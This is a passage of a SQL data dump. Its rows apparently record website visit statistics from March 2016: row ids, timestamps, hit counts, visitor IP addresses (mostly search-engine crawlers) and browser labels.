9985,1,1,0,0,'141.8.132.105','other'),(26531,1458960148,1,1,0,0,'217.69.133.84','other'),(26532,1458960172,1,1,0,0,'217.69.133.231','other'),(26533,1458960683,2,2,0,0,'217.69.133.29','other'),(26534,1458960684,1,1,0,0,'217.69.133.60','other'),(26535,1458960786,2,1,1,0,'66.249.64.223',''),(26536,1458961098,1,1,0,0,'188.40.95.70','other'),(26537,1458961221,1,1,0,0,'217.69.143.48','other'),(26538,1458961299,1,1,0,0,'217.69.143.68','other'),(26539,1458961770,1,0,1,0,'66.249.64.223',''),(26540,1458962062,1,1,0,0,'217.69.133.217','other'),(26541,1458962797,1,1,0,0,'217.69.133.247','other'),(26542,1458962798,1,1,0,0,'217.69.133.242','other'),(26543,1458963146,1,1,0,0,'8.29.198.26','other'),(26544,1458963402,1,0,1,0,'66.249.64.228',''),(26545,1458963542,1,1,0,0,'217.69.133.85','other'),(26546,1458963565,1,1,0,0,'37.55.227.14','other'),(26547,1458963862,1,1,0,0,'217.69.133.232','other'),(26548,1458963872,1,0,1,0,'66.249.64.233',''),(26549,1458964075,1,1,0,0,'66.249.64.223','other'),(26550,1458964216,1,1,0,0,'141.8.132.105','other'),(26551,1458964252,1,1,0,0,'217.69.133.235','other'),(26552,1458964490,1,1,0,0,'217.69.133.244','other'),(26553,1458964822,1,1,0,0,'180.76.15.11','other'),(26554,1458964891,1,1,0,0,'217.69.133.223','other'),(26555,1458964901,1,1,0,0,'180.76.15.29','other'),(26556,1458965076,1,1,0,0,'95.213.218.103','other'),(26557,1458965235,1,1,0,0,'217.69.133.60','other'),(26558,1458965236,1,1,0,0,'217.69.133.192','other'),(26559,1458965851,1,1,0,0,'66.249.64.233','other'),(26560,1458965954,1,0,1,0,'66.249.64.223',''),(26561,1458966381,1,1,0,0,'217.69.133.10','other'),(26562,1458966402,1,0,1,0,'68.180.231.29',''),(26563,1458966584,1,1,0,0,'217.69.133.225','other'),(26564,1458966735,1,1,0,0,'66.249.89.116','other'),(26565,1458967306,1,0,1,0,'66.249.64.162',''),(26566,1458967452,1,1,0,0,'180.76.15.33','other'),(26567,1458967615,1,1,0,0,'207.46.13.101','other'),(26568,1458967774,1,1,0,0,'217.69.133.227','other'),(26569,1458968321,5,5,0,0,'188.40.95.70','other'),(26570,1458968792,1,1,0,0,'217.69.133.70','other'),(26571,1458968835,2,0,2,0,'68.180.231.29',''),(26572,1458968840,1,1,0,0,'217.69.133.218','other'),(26573,1458968995,1,1,0,0,'37.54.236.141','firefox'),(26574,1458969217,1,1,0,0,'62.210.215.100','chrome'),(26575,1458969341,1,0,1,0,'66.249.64.233',''),(26576,1458969808,1,1,0,0,'217.69.133.224','other'),(26577,1458969891,1,1,0,0,'207.46.13.168','other'),(26578,1458970271,1,1,0,0,'217.69.133.69','other'),(26579,1458970316,1,0,1,0,'66.249.64.228',''),(26580,1458970568,1,1,0,0,'217.69.133.219','other'),(26581,1458970785,1,0,1,0,'66.249.64.156',''),(26582,1458970834,1,0,1,0,'66.249.64.162',''),(26583,1458971485,2,0,2,0,'66.249.64.228',''),(26584,1458972415,6,0,6,0,'68.180.231.29',''),(26585,1458972531,2,0,2,0,'66.249.64.223',''),(26586,1458972855,1,1,0,0,'217.69.133.227','other'),(26587,1458973364,1,0,1,0,'66.249.64.233',''),(26588,1458974007,1,1,0,0,'8.29.198.25','other'),(26589,1458974092,1,0,1,0,'66.249.64.223',''),(26590,1458974269,1,1,0,0,'66.102.9.86','chrome'),(26591,1458974270,1,1,0,0,'217.69.133.217','other'),(26592,1458974510,1,1,0,0,'180.76.15.152','other'),(26593,1458974515,2,0,2,0,'66.249.64.228',''),(26594,1458974615,1,1,0,0,'66.249.64.228','other'),(26595,1458975257,1,1,0,0,'217.69.133.243','other'),(26596,1458975421,2,0,2,0,'66.249.64.233',''),(26597,1458975509,1,1,0,0,'217.69.133.191','other'),(26598,1458975511,1,1,0,0,'217.69.133.253','other'),(26599,1458975785,1,1,0,0,'217.69.133.251','other'),(26600,1458975922,1,1,0,0,'217.69.133.11','other'),(26601,1458975994,1,1,0,0,'217.69.133.239','other'),(26602,1458976253,1,0,1,0,'66.249.64.162',''),(26603,1458976647,2,0,2,0,'66.249.64.233',''),(26604,1458976919,1,0,1,0,'66.249.64.228',''),(26605,1458977136,2,0,2,0,'68.180.231.29',''),(26606,1458977188,1,1,0,0,'217.69.133.216','other'),(26607,1458977925,1,1,0,0,'66.249.89.116','other'),(26608,1458978243,1,1,0,0,'91.196.178.163','firefox'),(26609,1458978338,1,1,0,0,'62.210.215.100','chrome'),(26610,1458978826,1,1,0,0,'217.69.133.231','other'),(26611,1458978827,1,1,0,0,'217.69.133.227','other'),(26612,1458979292,1,1,0,0,'207.46.13.168','other'),(26613,1458979519,4,0,4,0,'66.249.64.223',''),(26614,1458980559,3,1,2,0,'66.249.64.223',''),(26615,1458980853,1,0,1,0,'68.180.231.29',''),(26616,1458981829,1,1,0,0,'217.69.133.190','other'),(26617,1458981831,1,1,0,0,'217.69.133.247','other'),(26618,1458981874,4,4,0,0,'149.202.48.176','other'),(26619,1458982274,1,1,0,0,'207.46.13.168','other'),(26620,1458982826,1,1,0,0,'217.69.136.207','other'),(26621,1458982931,2,0,2,0,'68.180.231.29',''),(26622,1458983466,1,1,0,0,'217.69.133.232','other'),(26623,1458983491,1,1,0,0,'217.69.133.226','other'),(26624,1458983649,1,1,0,0,'95.134.220.99','chrome'),(26625,1458983686,1,0,1,0,'66.249.64.223',''),(26626,1458983778,1,0,1,0,'66.249.64.233',''),(26627,1458984174,1,1,0,0,'217.69.133.67','other'),(26628,1458984459,1,1,0,0,'217.69.133.229','other'),(26629,1458984753,2,2,0,0,'92.113.190.44','chrome'),(26630,1458984882,1,1,0,0,'8.29.198.25','other'),(26631,1458985538,2,0,2,0,'68.180.231.29',''),(26632,1458985804,1,1,0,0,'66.249.64.223','other'),(26633,1458985964,1,0,1,0,'66.249.64.228',''),(26634,1458986134,200,200,0,0,'89.163.148.58','other'),(26635,1458986312,1,1,0,0,'217.69.133.233','other'),(26636,1458986396,2,1,1,0,'66.249.64.150',''),(26637,1458986415,1,0,1,0,'66.249.64.162',''),(26638,1458986584,1,0,1,0,'68.180.231.29',''),(26639,1458986606,1,1,0,0,'37.52.22.89','firefox'),(26640,1458986658,1,1,0,0,'95.134.220.99','chrome'),(26641,1458986885,4,1,3,0,'66.249.64.223',''),(26642,1458987069,1,1,0,0,'5.255.253.47','other'),(26643,1458987534,2,2,0,0,'141.8.132.105','other'),(26644,1458987539,1,1,0,0,'178.154.189.37','other'),(26645,1458987543,1,1,0,0,'141.8.132.83','other'),(26646,1458987547,1,1,0,0,'217.69.133.72','other'),(26647,1458987554,2,2,0,0,'130.193.50.34','other'),(26648,1458987585,1,1,0,0,'130.193.51.74','other'),(26649,1458988041,2,2,0,0,'5.255.253.47','other'),(26650,1458988049,1,1,0,0,'66.249.64.223','other'),(26651,1458988050,1,1,0,0,'5.255.253.9','other'),(26652,1458988053,2,2,0,0,'141.8.132.52','other'),(26653,1458988062,1,1,0,0,'178.154.149.11','other'),(26654,1458988069,1,1,0,0,'178.154.189.31','other'),(26655,1458988073,1,1,0,0,'93.158.152.26','other'),(26656,1458988076,2,2,0,0,'141.8.142.62','other'),(26657,1458988080,2,2,0,0,'5.255.253.100','other'),(26658,1458988083,1,1,0,0,'5.255.253.113','other'),(26659,1458988090,1,1,0,0,'141.8.184.11','other'),(26660,1458988097,1,1,0,0,'5.255.253.53','other'),(26661,1458988106,1,1,0,0,'141.8.142.10','other'),(26662,1458988109,1,1,0,0,'130.193.50.4','other'),(26663,1458988112,1,1,0,0,'130.193.37.7','other'),(26664,1458988115,1,1,0,0,'130.193.51.81','other'),(26665,1458988542,1,1,0,0,'62.210.215.100','chrome'),(26666,1458988607,1,0,1,0,'66.249.64.233',''),(26667,1458988657,1,0,1,0,'66.249.64.162',''),(26668,1458988663,1,1,0,0,'5.255.253.36','other'),(26669,1458988718,1,0,1,0,'68.180.229.103',''),(26670,1458988837,1,1,0,0,'66.249.89.118','other'),(26671,1458988999,16,0,16,0,'66.249.64.223',''),(26672,1458989125,1,1,0,0,'141.8.132.101','other'),(26673,1458989128,1,1,0,0,'5.255.253.113','other'),(26674,1458989132,1,1,0,0,'141.8.132.52','other'),(26675,1458989136,1,1,0,0,'141.8.184.11','other'),(26676,1458989140,1,1,0,0,'5.255.253.26','other'),(26677,1458989573,1,0,1,0,'66.249.64.228',''),(26678,1458989623,1,1,0,0,'157.55.39.31','other'),(26679,1458989644,1,1,0,0,'93.158.152.46','other'),(26680,1458989909,17,0,17,0,'66.249.64.223',''),(26681,1458989972,1,0,1,0,'66.249.64.150',''),(26682,1458990086,1,1,0,0,'141.8.132.99','other'),(26683,1458990095,1,1,0,0,'130.193.50.34','other'),(26684,1458990123,4,4,0,0,'130.193.50.6','other'),(26685,1458990143,2,2,0,0,'130.193.51.43','other'),(26686,1458990147,1,1,0,0,'141.8.142.85','other'),(26687,1458990151,1,1,0,0,'130.193.51.74','other'),(26688,1458990166,1,1,0,0,'141.8.142.62','other'),(26689,1458990177,2,2,0,0,'141.8.132.2','other'),(26690,1458990181,2,2,0,0,'93.158.152.75','other'),(26691,1458990206,2,2,0,0,'5.255.253.47','other'),(26692,1458990211,1,1,0,0,'141.8.184.11','other'),(26693,1458990218,1,1,0,0,'130.193.37.21','other'),(26694,1458990225,1,1,0,0,'93.158.152.9','other'),(26695,1458990231,1,1,0,0,'5.255.253.26','other'),(26696,1458990241,1,1,0,0,'130.193.51.79','other'),(26697,1458990247,1,1,0,0,'141.8.183.14','other'),(26698,1458990248,10,1,9,0,'66.249.64.223',''),(26699,1458990267,1,1,0,0,'141.8.132.105','other'),(26700,1458990273,1,1,0,0,'5.255.253.10','other'),(26701,1458990277,1,1,0,0,'130.193.50.32','other'),(26702,1458990298,1,1,0,0,'178.154.149.11','other'),(26703,1458990538,2,2,0,0,'217.69.133.223','other'),(26704,1458990943,3,0,3,0,'66.249.64.233',''),(26705,1458991001,2,0,2,0,'66.249.64.156',''),(26706,1458991151,43,0,43,0,'66.249.64.223',''),(26707,1458991186,1,0,1,0,'66.249.64.162',''),(26708,1458991241,1,1,0,0,'5.255.253.9','other'),(26709,1458991511,1,1,0,0,'130.193.50.201','other'),(26710,1458991554,2,0,2,0,'66.249.64.228',''),(26711,1458991598,1,1,0,0,'217.69.133.69','other'),(26712,1458992052,3,0,3,0,'66.249.64.223',''),(26713,1458992128,1,1,0,0,'62.210.215.100','chrome'),(26714,1458992159,1,1,0,0,'217.69.133.233','other'),(26715,1458992187,1,1,0,0,'141.8.132.105','other'),(26716,1458992191,1,1,0,0,'5.255.253.10','other'),(26717,1458992569,2,0,2,0,'66.249.64.228',''),(26718,1458992598,1,1,0,0,'157.55.39.31','other'),(26719,1458992704,2,1,1,0,'66.249.64.223',''),(26720,1458993098,1,1,0,0,'93.158.152.46','other'),(26721,1458993597,2,2,0,0,'217.69.133.216','other'),(26722,1458993726,1,1,0,0,'207.46.13.53','other'),(26723,1458993890,1,1,0,0,'130.193.51.45','other'),(26724,1458993895,1,1,0,0,'130.193.50.34','other'),(26725,1458993899,1,1,0,0,'5.255.253.36','other'),(26726,1458993901,1,1,0,0,'217.69.133.13','other'),(26727,1458993904,1,1,0,0,'93.158.152.51','other'),(26728,1458993908,1,1,0,0,'141.8.132.105','other'),(26729,1458993913,1,1,0,0,'141.8.142.78','other'),(26730,1458994223,1,1,0,0,'91.196.178.99','chrome'),(26731,1458994361,1,1,0,0,'157.55.39.31','other'),(26732,1458994633,1,1,0,0,'217.69.133.220','other'),(26733,1458994827,1,1,0,0,'66.249.64.162','other'),(26734,1458994943,1,1,0,0,'37.9.122.203','other'),(26735,1458994946,1,1,0,0,'130.193.50.201','other'),(26736,1458995108,1,1,0,0,'141.8.142.62','other'),(26737,1458995536,1,1,0,0,'217.69.133.231','other'),(26738,1458995580,2,0,2,0,'66.249.64.223',''),(26739,1458995623,1,1,0,0,'157.55.39.31','other'),(26740,1458995710,1,1,0,0,'8.29.198.26','other'),(26741,1458995911,1,1,0,0,'91.196.178.163','firefox'),(26742,1458995949,1,1,0,0,'217.69.133.232','other'),(26743,1458995993,2,2,0,0,'130.193.50.34','other'),(26744,1458995998,2,2,0,0,'5.255.253.26','other'),(26745,1458996002,1,1,0,0,'141.8.132.2','other'),(26746,1458996010,1,1,0,0,'141.8.132.105','other'),(26747,1458996014,1,1,0,0,'141.8.142.61','other'),(26748,1458996019,1,1,0,0,'141.8.142.85','other'),(26749,1458996023,1,1,0,0,'141.8.132.41','other'),(26750,1458996027,1,1,0,0,'5.255.253.47','other'),(26751,1458996031,2,2,0,0,'141.8.132.30','other'),(26752,1458996035,1,1,0,0,'93.158.152.61','other'),(26753,1458996040,1,1,0,0,'141.8.142.62','other'),(26754,1458996048,1,1,0,0,'141.8.132.99','other'),(26755,1458996105,2,1,1,0,'66.249.64.233',''),(26756,1458996219,1,1,0,0,'95.133.238.53','chrome'),(26757,1458996644,1,0,1,0,'66.249.64.228',''),(26758,1458996667,1,1,0,0,'66.249.64.150','other'),(26759,1458996882,3,3,0,0,'91.196.178.163','firefox'),(26760,1458997147,2,2,0,0,'77.52.180.238','chrome'),(26761,1458997204,2,2,0,0,'66.249.64.223','other'),(26762,1458997303,1,0,1,0,'66.249.64.233',''),(26763,1458997447,1,1,0,0,'217.69.133.223','other'),(26764,1458997506,1,1,0,0,'217.69.133.69','other'),(26765,1458997508,1,1,0,0,'217.69.133.231','other'),(26766,1458997818,1,1,0,0,'66.249.64.162','other'),(26767,1458997894,2,2,0,0,'66.249.64.156','other'),(26768,1458997897,1,1,0,0,'91.196.178.163','firefox'),(26769,1458997946,1,1,0,0,'207.46.13.53','other'),(26770,1458998150,1,1,0,0,'66.249.64.150','other'),(26771,1458998276,2,0,2,0,'66.249.64.233',''),(26772,1458998332,1,0,1,0,'66.249.64.228',''),(26773,1458998405,2,1,1,0,'66.249.64.228',''),(26774,1458998564,1,1,0,0,'62.210.215.100','chrome'),(26775,1458998797,1,1,0,0,'94.179.70.43','chrome'),(26776,1458998963,1,1,0,0,'217.69.133.216','other'),(26777,1458999058,1,1,0,0,'207.46.13.53','other'),(26778,1458999076,191,191,0,0,'88.198.16.153','other'),(26779,1458999499,3,0,3,0,'66.249.64.233',''),(26780,1458999514,1,1,0,0,'91.196.178.162','chrome'),(26781,1458999561,1,1,0,0,'141.8.142.62','other'),(26782,1458999565,1,1,0,0,'130.193.37.7','other'),(26783,1458999650,1,1,0,0,'217.69.133.3','other'),(26784,1458999651,1,1,0,0,'217.69.133.203','other'),(26785,1458999655,1,1,0,0,'66.249.89.118','other'),(26786,1458999740,1,1,0,0,'217.69.133.67','other'),(26787,1458999924,1,1,0,0,'217.69.133.225','other'),(26788,1459000204,1,1,0,0,'91.196.178.163','firefox'),(26789,1459001092,1,1,0,0,'62.210.215.100','chrome'),(26790,1459001460,1,0,1,0,'66.249.64.223',''),(26791,1459001518,1,0,1,0,'66.249.64.228',''),(26792,1459002122,1,1,0,0,'217.69.133.239','other'),(26793,1459002162,1,1,0,0,'207.46.13.168','other'),(26794,1459002625,1,1,0,0,'83.143.240.10','firefox'),(26795,1459002763,1,0,1,0,'66.249.64.223',''),(26796,1459002955,1,1,0,0,'217.69.133.242','other'),(26797,1459003299,1,1,0,0,'93.158.152.9','other'),(26798,1459003454,1,0,1,0,'66.249.64.156',''),(26799,1459003542,1,1,0,0,'66.249.64.228','other'),(26800,1459003570,2,2,0,0,'141.8.132.101','other'),(26801,1459003575,1,1,0,0,'141.8.142.25','other'),(26802,1459003579,1,1,0,0,'130.193.50.38','other'),(26803,1459003583,1,1,0,0,'130.193.51.14','other'),(26804,1459003587,2,2,0,0,'141.8.132.30','other'),(26805,1459003591,2,2,0,0,'93.158.152.75','other'),(26806,1459003595,1,1,0,0,'141.8.183.14','other'),(26807,1459003600,1,1,0,0,'130.193.51.83','other'),(26808,1459004024,1,0,1,0,'66.249.64.233',''),(26809,1459004103,2,2,0,0,'66.249.64.233','other'),(26810,1459004360,1,1,0,0,'178.154.189.203','other'),(26811,1459004363,1,1,0,0,'178.154.189.201','other'),(26812,1459004742,3,1,2,0,'66.249.64.228',''),(26813,1459004794,2,1,1,0,'66.249.64.223',''),(26814,1459004909,1,1,0,0,'217.69.133.236','other'),(26815,1459005055,2,2,0,0,'157.55.39.31','other'),(26816,1459005110,1,1,0,0,'66.249.93.108','chrome'),(26817,1459005113,1,1,0,0,'91.196.178.39','firefox'),(26818,1459005297,1,1,0,0,'91.196.178.35','firefox'),(26819,1459005409,2,1,1,0,'66.249.64.228',''),(26820,1459005866,4,3,1,0,'66.249.64.228',''),(26821,1459006233,1,1,0,0,'157.55.39.31','other'),(26822,1459006424,1,0,1,0,'66.249.64.233',''),(26823,1459006480,2,1,1,0,'66.249.64.228',''),(26824,1459006548,1,1,0,0,'8.29.198.26','other'),(26825,1459006681,1,1,0,0,'207.46.13.168','other'),(26826,1459006860,1,1,0,0,'217.69.133.222','other'),(26827,1459007195,1,1,0,0,'66.249.64.223','other'),(26828,1459007544,1,0,1,0,'68.180.231.29',''),(26829,1459007746,1,1,0,0,'62.210.215.100','chrome'),(26830,1459008328,1,1,0,0,'217.69.133.230','other'),(26831,1459008346,1,0,1,0,'66.249.64.233',''),(26832,1459008557,1,1,0,0,'217.69.133.234','other'),(26833,1459008668,1,1,0,0,'217.69.136.205','other'),(26834,1459008669,1,1,0,0,'217.69.136.206','other'),(26835,1459008670,1,1,0,0,'217.69.136.210','other'),(26836,1459008707,1,1,0,0,'66.249.64.150','other'),(26837,1459009152,1,1,0,0,'217.69.133.14','other'),(26838,1459009389,1,1,0,0,'130.193.50.38','other'),(26839,1459009563,1,1,0,0,'62.210.215.100','chrome'),(26840,1459009706,2,2,0,0,'5.255.253.113','other'),(26841,1459009797,26,26,0,0,'51.254.129.90','other'),(26842,1459010138,1,1,0,0,'220.181.108.162','other'),(26843,1459010168,1,1,0,0,'217.69.133.228','other'),(26844,1459010194,2,2,0,0,'130.193.50.34','other'),(26845,1459010215,1,1,0,0,'66.249.89.116','other'),(26846,1459010261,1,1,0,0,'217.69.133.215','other'),(26847,1459010389,2,2,0,0,'66.249.64.223','other'),(26848,1459010438,1,1,0,0,'157.55.39.31','other'),(26849,1459010729,1,1,0,0,'178.154.189.37','other'),(26850,1459010733,1,1,0,0,'141.8.183.19','other'),(26851,1459011053,1,1,0,0,'66.249.64.228','other'),(26852,1459011350,20,20,0,0,'130.193.50.34','other'),(26853,1459011387,2,1,1,0,'66.249.64.233',''),(26854,1459011459,1,1,0,0,'217.69.133.219','other'),(26855,1459011600,14,14,0,0,'5.255.253.113','other'),(26856,1459011608,17,17,0,0,'141.8.183.25','other'),(26857,1459011610,16,16,0,0,'141.8.132.105','other'),(26859,1459011614,7,7,0,0,'130.193.51.83','other'),(26860,1459011719,1,0,1,0,'68.180.231.29',''),(26861,1459011988,46,46,0,0,'5.9.63.149','other'),(26862,1459011993,1,1,0,0,'141.8.142.67','other'),(26863,1459011995,3,3,0,0,'141.8.142.58','other'),(26864,1459012002,6,6,0,0,'130.193.51.19','other'),(26865,1459012020,1,1,0,0,'93.158.152.84','other'),(26866,1459012279,2,2,0,0,'66.249.64.223','other'),(26867,1459012442,1,1,0,0,'130.193.51.14','other'),(26869,1459012535,4,4,0,0,'66.249.64.233','other'),(26870,1459012763,1,1,0,0,'66.249.64.228','other'),(26871,1459012782,9,9,0,0,'141.8.183.25','other'),(26872,1459012783,6,6,0,0,'130.193.50.34','other'),(26873,1459013117,10,10,0,0,'141.8.132.105','other'),(26874,1459013503,3,3,0,0,'130.193.51.19','other'),(26875,1459013505,3,3,0,0,'141.8.142.61','other'),(26876,1459013511,2,2,0,0,'141.8.142.58','other'),(26877,1459013512,5,5,0,0,'5.255.253.113','other'),(26878,1459013517,2,2,0,0,'130.193.51.83','other'),(26879,1459013544,4,4,0,0,'130.193.51.79','other'),(26881,1459013547,1,1,0,0,'141.8.132.101','other'),(26882,1459013555,2,2,0,0,'130.193.51.14','other'),(26883,1459013556,1,1,0,0,'141.8.142.85','other'),(26885,1459013561,2,2,0,0,'130.193.50.6','other'),(26886,1459013564,1,1,0,0,'178.154.189.31','other'),(26888,1459013569,1,1,0,0,'141.8.132.10','other'),(26889,1459013570,1,1,0,0,'93.158.152.40','other'),(26890,1459013572,1,1,0,0,'141.8.142.25','other'),(26891,1459013573,1,1,0,0,'93.158.152.61','other'),(26892,1459013574,2,2,0,0,'5.255.253.68','other'),(26893,1459013577,1,1,0,0,'93.158.152.84','other'),(26894,1459013580,1,1,0,0,'178.154.189.37','other'),(26895,1459013583,1,1,0,0,'141.8.132.41','other'),(26896,1459013589,1,1,0,0,'141.8.183.19','other'),(26897,1459013592,1,1,0,0,'178.154.149.10','other'),(26898,1459013838,3,3,0,0,'66.249.64.233','other'),(26899,1459013884,1,1,0,0,'217.69.133.233','other'),(26900,1459013996,2,0,2,0,'68.180.231.29',''),(26901,1459014014,2,2,0,0,'130.193.50.34','other'),(26902,1459014149,1,1,0,0,'217.69.133.224','other'),(26903,1459014543,1,1,0,0,'207.46.13.101','other'),(26904,1459015441,3,3,0,0,'66.249.64.228','other'),(26905,1459015487,64,64,0,0,'149.56.110.177','other'),(26906,1459015494,1,0,1,0,'66.249.64.223',''),(26907,1459015702,1,1,0,0,'5.255.253.113','other'),(26908,1459015984,1,1,0,0,'37.52.22.89','firefox'),(26909,1459016185,1,0,1,0,'68.180.231.29',''),(26910,1459016282,2,2,0,0,'66.249.64.233','other'),(26911,1459016586,1,1,0,0,'217.69.133.233','other'),(26912,1459016607,1,1,0,0,'141.8.142.61','other'),(26913,1459016608,1,1,0,0,'178.154.189.37','other'),(26914,1459016698,1,0,1,0,'66.249.64.156',''),(26915,1459016726,1,0,1,0,'66.249.64.162',''),(26916,1459016981,1,0,1,0,'66.249.64.228',''),(26917,1459017261,1,1,0,0,'95.133.238.26','chrome'),(26918,1459017378,1,1,0,0,'8.29.198.26','other'),(26919,1459017489,1,1,0,0,'130.193.50.34','other'),(26920,1459017566,1,1,0,0,'91.124.182.71','chrome'),(26921,1459017692,1,0,1,0,'66.249.64.223',''),(26922,1459017866,1,0,1,0,'68.180.231.29',''),(26923,1459017869,1,1,0,0,'66.249.64.233','other'),(26924,1459017992,2,2,0,0,'66.249.64.223','other'),(26925,1459018229,1,1,0,0,'217.69.133.220','other'),(26926,1459018502,1,1,0,0,'141.8.132.105','other'),(26927,1459018619,1,1,0,0,'217.69.133.235','other'),(26928,1459019004,2,0,2,0,'66.249.64.223',''),(26929,1459019027,1,1,0,0,'91.124.182.71','chrome'),(26930,1459019114,1,1,0,0,'91.196.178.35','chrome'),(26931,1459019257,3,3,0,0,'66.249.64.233','other'),(26932,1459019496,5,5,0,0,'144.76.12.75','other'),(26933,1459019499,1,1,0,0,'141.8.132.105','other'),(26934,1459019653,2,2,0,0,'66.249.64.223','other'),(26935,1459019669,1,1,0,0,'217.69.133.216','other'),(26936,1459019708,1,1,0,0,'217.69.133.234','other'),(26937,1459019989,1,1,0,0,'62.210.215.100','chrome'),(26938,1459020321,1,1,0,0,'141.8.142.58','other'),(26939,1459020586,1,1,0,0,'66.249.89.118','other'),(26940,1459020645,3,3,0,0,'66.249.64.233','other'),(26941,1459020907,18,18,0,0,'130.193.50.34','other'),(26942,1459020908,20,20,0,0,'141.8.132.105','other'),(26943,1459020916,6,6,0,0,'141.8.183.25','other'),(26944,1459020946,2,2,0,0,'66.249.64.228','other'),(26945,1459020992,2,2,0,0,'66.249.64.223','other'),(26946,1459021002,1,1,0,0,'207.46.13.168','other'),(26947,1459021197,1,1,0,0,'178.92.171.89','chrome'),(26948,1459021248,1,1,0,0,'178.154.189.37','other'),(26949,1459021249,1,1,0,0,'141.8.132.101','other'),(26950,1459021250,1,1,0,0,'141.8.142.25','other'),(26952,1459021251,1,1,0,0,'93.158.152.61','other'),(26953,1459021252,1,1,0,0,'5.255.253.68','other'),(26955,1459021253,1,1,0,0,'141.8.132.41','other'),(26956,1459021254,1,1,0,0,'5.255.253.67','other'),(26957,1459021256,1,1,0,0,'5.255.253.113','other'),(26958,1459021257,1,1,0,0,'130.193.51.83','other'),(26959,1459021402,1,1,0,0,'178.93.81.57','chrome'),(26960,1459021766,1,1,0,0,'217.69.133.84','other'),(26961,1459022148,1,1,0,0,'91.124.182.71','chrome'),(26962,1459022243,1,1,0,0,'217.69.133.228','other'),(26963,1459022395,1,1,0,0,'5.9.111.70','other'),(26964,1459022664,1,1,0,0,'217.69.133.6','other'),(26965,1459022823,1,1,0,0,'130.193.50.6','other'),(26966,1459023011,1,0,1,0,'66.249.64.150',''),(26967,1459023048,2,1,1,0,'66.249.64.233',''),(26968,1459023070,3,3,0,0,'66.249.64.150','other'),(26969,1459023147,1,0,1,0,'68.180.231.29',''),(26970,1459023176,2,2,0,0,'66.249.64.228','other'),(26971,1459023218,1,1,0,0,'66.249.64.223','other'),(26972,1459023240,1,1,0,0,'37.52.16.17','other'),(26973,1459023885,1,1,0,0,'91.196.178.67','other'),(26974,1459023901,1,1,0,0,'217.69.133.223','other'),(26975,1459024151,1,1,0,0,'91.196.178.38','chrome'),(26976,1459024166,1,0,1,0,'66.249.64.223',''),(26977,1459024254,1,1,0,0,'78.111.190.186','chrome'),(26978,1459024329,1,0,1,0,'66.249.64.228',''),(26979,1459024552,1,1,0,0,'217.69.133.85','other'),(26980,1459024830,1,1,0,0,'217.69.133.18','other'),(26981,1459025336,1,1,0,0,'217.69.133.68','other'),(26982,1459025419,1,1,0,0,'93.158.152.84','other'),(26983,1459025975,41,41,0,0,'173.234.153.123','other'),(26984,1459025995,1,0,1,0,'66.249.64.233',''),(26985,1459026277,1,1,0,0,'217.69.133.216','other'),(26986,1459026278,1,1,0,0,'217.69.133.217','other'),(26988,1459027033,1,0,1,0,'66.249.64.223',''),(26989,1459027154,1,1,0,0,'157.55.39.31','other'),(26990,1459027314,4,4,0,0,'62.210.148.247','other'),(26991,1459027359,7,7,0,0,'130.193.50.34','other'),(26992,1459027361,4,4,0,0,'141.8.132.105','other'),(26993,1459027415,1,0,1,0,'66.249.64.228',''),(26994,1459027614,1,1,0,0,'217.69.133.233','other'),(26995,1459027981,3,3,0,0,'5.9.63.149','other'),(26996,1459028114,1,0,1,0,'66.249.64.223',''),(26997,1459028189,1,0,1,0,'66.249.64.233',''),(26998,1459028287,1,1,0,0,'8.29.198.25','other'),(26999,1459028497,1,0,1,0,'66.249.64.150',''),(27000,1459028731,5,0,5,0,'66.249.64.228',''),(27001,1459028771,1,1,0,0,'217.69.133.69','other'),(27003,1459029112,2,0,2,0,'66.249.64.223',''),(27004,1459029177,1,1,0,0,'62.210.215.100','chrome'),(27005,1459029233,1,1,0,0,'207.46.13.53','other'),(27006,1459029811,1,1,0,0,'157.55.39.31','other'),(27007,1459029847,1,0,1,0,'66.249.64.228',''),(27008,1459030444,6,0,6,0,'66.249.64.223',''),(27009,1459030546,1,1,0,0,'217.69.133.232','other'),(27011,1459030792,1,1,0,0,'217.69.133.215','other'),(27012,1459030805,1,1,0,0,'66.249.64.233','other'),(27013,1459030857,1,1,0,0,'66.249.89.114','other'),(27014,1459030891,1,1,0,0,'176.98.70.133','chrome'),(27015,1459030930,1,1,0,0,'217.69.133.236','other'),(27016,1459031060,55,55,0,0,'157.55.39.31','other'),(27017,1459031065,44,44,0,0,'207.46.13.101','other'),(27018,1459031201,3,0,3,0,'66.249.64.228',''),(27019,1459031280,1,1,0,0,'141.8.132.105','other'),(27020,1459031289,1,1,0,0,'141.8.142.67','other'),(27021,1459031300,3,3,0,0,'178.63.13.15','other'),(27022,1459031350,8,0,8,0,'66.249.64.223',''),(27023,1459031361,1,1,0,0,'5.255.253.113','other'),(27024,1459031365,1,1,0,0,'130.193.51.83','other'),(27025,1459031487,45,45,0,0,'207.46.13.53','other'),(27026,1459031541,54,54,0,0,'157.55.39.106','other'),(27027,1459031727,1,0,1,0,'66.249.64.233',''),(27028,1459031748,1,1,0,0,'217.69.133.221','other'),(27029,1459031923,2,2,0,0,'69.30.213.138','other'),(27030,1459031938,1,1,0,0,'37.55.227.137','other'),(27031,1459032259,1,1,0,0,'91.196.178.162','chrome'),(27032,1459032649,2,0,2,0,'66.249.64.223',''),(27033,1459033113,1,1,0,0,'217.69.133.232','other'),(27034,1459033329,1,1,0,0,'157.55.39.106','other'),(27035,1459033816,1,1,0,0,'178.154.189.37','other'),(27036,1459034173,10,1,9,0,'66.249.64.223',''),(27037,1459034413,2,0,2,0,'66.249.64.150',''),(27038,1459034421,1,0,1,0,'66.249.64.228',''),(27039,1459034556,1,1,0,0,'217.69.133.219','other'),(27040,1459034830,1,1,0,0,'217.69.133.227','other'),(27041,1459034911,1,0,1,0,'68.180.231.29',''),(27042,1459035908,1,0,1,0,'68.180.231.29',''),(27043,1459036036,1,1,0,0,'141.8.183.19','other'),(27044,1459036039,1,1,0,0,'130.193.51.19','other'),(27045,1459036193,1,1,0,0,'217.69.133.230','other'),(27046,1459036252,1,0,1,0,'66.249.64.156',''),(27047,1459036302,2,0,2,0,'66.249.64.228',''),(27048,1459036318,1,0,1,0,'66.249.64.150',''),(27049,1459036335,3,0,3,0,'66.249.64.223',''),(27050,1459036685,1,1,0,0,'207.46.13.53','other'),(27051,1459036698,1,1,0,0,'157.55.39.31','other'),(27052,1459037437,1,1,0,0,'217.69.133.2','other'),(27053,1459037438,1,1,0,0,'217.69.133.3','other'),(27054,1459037456,1,1,0,0,'157.55.39.106','other'),(27055,1459037499,9,1,8,0,'66.249.64.223',''),(27056,1459037835,3,0,3,0,'66.249.64.233',''),(27057,1459037872,1,1,0,0,'217.69.133.68','other'),(27058,1459038498,2,0,